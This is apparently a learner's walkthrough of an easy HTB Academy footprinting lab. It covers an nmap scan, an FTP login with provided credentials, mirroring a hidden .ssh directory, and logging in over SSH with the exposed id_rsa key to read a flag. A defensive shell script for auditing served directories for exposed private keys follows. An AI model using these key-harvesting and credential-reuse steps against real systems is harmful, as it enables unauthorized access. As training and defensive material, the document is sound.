HTB Academy: Footprinting Lab - Easy

Right off the bat, there were credentials provided to us: ceil:qwer1234

They also included a note about target employees discussing SSH keys in a public forum online.

1. I'm going to start by initiating an nmap scan to discover open ports, services, and service versions

    sudo nmap -sV -sC -vv -p- 10.129.35.86

2. After receiving the results, I see that ports 21, 22, 53, and 2121 are open, running FTP, SSH, DNS, and an FTP proxy


3. I am going to attempt to log into the FTP server using the credentials provided at the beginning of the lab 

4. Connecting to the FTP server via port 21 with Ceil's provided credentials is unsuccessful

5. I am going to attempt to connect to the FTP server via port 2121 and log in with Ceil's credentials

    ftp 10.129.35.86 2121

    user

    ceil

    qwer1234

5. The login was successful. I am now going to list out the files present on the working directory

    ls

6. There are no files listed in the present working directory. I am going to try one more command to display hidden files

    ls -la



7. This shows several hidden files/directories in the current working directory. Already, we can flag the ".ssh" directory as a point of interest, since it likely contains SSH keys that we can use to gain access to the target server. I am now going to download all of the available files onto my host device after disconnecting from the FTP server

    exit

    wget -m --no-passive ftp://ceil:qwer1234@10.129.35.86




8. Once completed, I am now going to list out the files/directories in our current working directory
    
    ls



9. I am going to move into the directory 10.129.35.86

    cd 10.129.35.86

10. I am unable to access any of the files downloaded from the FTP server. I am going to try and download them from the proxy via port 2121

    
    wget -m --no-passive ftp://ceil:qwer1234@10.129.35.86:2121

   

11. The download was successful and stored the files in a directory called "10.129.35.86:2121" found on "/~". I am now going to enter the directory and show all hidden files

    cd 10.129.35.86:2121 

    ls -la


12. Now I am going to go into the .ssh directory and list the files present

    cd .ssh

    ls -la

13. I can see that there are several files available to us, authorized_keys, id_rsa, and id_rsa.pub. id_rsa is of most interest to us as I can use it to access the machine via ssh. I am now going to move the file to my Desktop directory.

    mv id_rsa /home/htb-ac-732254/Desktop

14. Next, I am going to change the permissions of the SSH key before using it to connect to the server via SSH

    cd /home/htb-ac-732254/Desktop

    chmod 600 id_rsa

    ssh -i id_rsa ceil@10.129.35.86

15. Now that I have successfully connected to the server via SSH, I am going to attempt to find the "flag.txt" file. First, I am going to see what directory I'm currently working in

    pwd

16. After identifying the current working directory, I will now check to see if there are any directories/files within the directory I'm currently working in

    ls -la

17. After identifying that there are no directories/files contained in my current working directory, I'm going to move up one to see what files are contained

    cd ..

    ls -la

    cd flag

    cat flag.txt
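
The access path in this lab was a private key readable through the FTP service on port 2121, sitting next to the authorized_keys file found in the same .ssh directory. As an added example (not part of the original walkthrough), here is one way an administrator could audit an FTP-served directory tree for that condition in POSIX shell; the function name and output format are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the walkthrough): audit a directory tree served by an
# FTP daemon, or a mirror of it, for private-key files. POSIX sh + find.

# Prints one line per private key found: "<mode> <status> <path>".
# <status> is "authorized" when the sibling <key>.pub blob also appears in an
# authorized_keys file in the same directory, i.e. the key logs in to this host.
find_exposed_keys() {
    # Keys are small, so files of 64 KiB or more are skipped.
    # Hidden directories such as .ssh are walked like any other.
    find "$1" -type f -size -65536c -exec sh -c '
        for f do
            first=""
            IFS= read -r first 2>/dev/null < "$f" || true
            case $first in
                "-----BEGIN "*"PRIVATE KEY-----"*) ;;   # PEM or OpenSSH header
                *) continue ;;
            esac
            dir=$(dirname "$f")
            status="-"
            if [ -r "$f.pub" ] && [ -r "$dir/authorized_keys" ]; then
                # Field 2 of a .pub line is the base64 key blob.
                blob=""
                read -r ktype blob rest < "$f.pub" || true
                if [ -n "$blob" ] && grep -qF -e "$blob" "$dir/authorized_keys"; then
                    status="authorized"
                fi
            fi
            mode=$(ls -ld "$f" | cut -c1-10)
            printf "%s %s %s\n" "$mode" "$status" "$f"
        done
    ' sh {} +
}

# Stand-alone use: pass the directory to audit as the first argument.
[ "$#" -eq 0 ] || find_exposed_keys "$1"
```

Any line marked "authorized" is a key that should be removed from the served tree and rotated out of authorized_keys.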


   



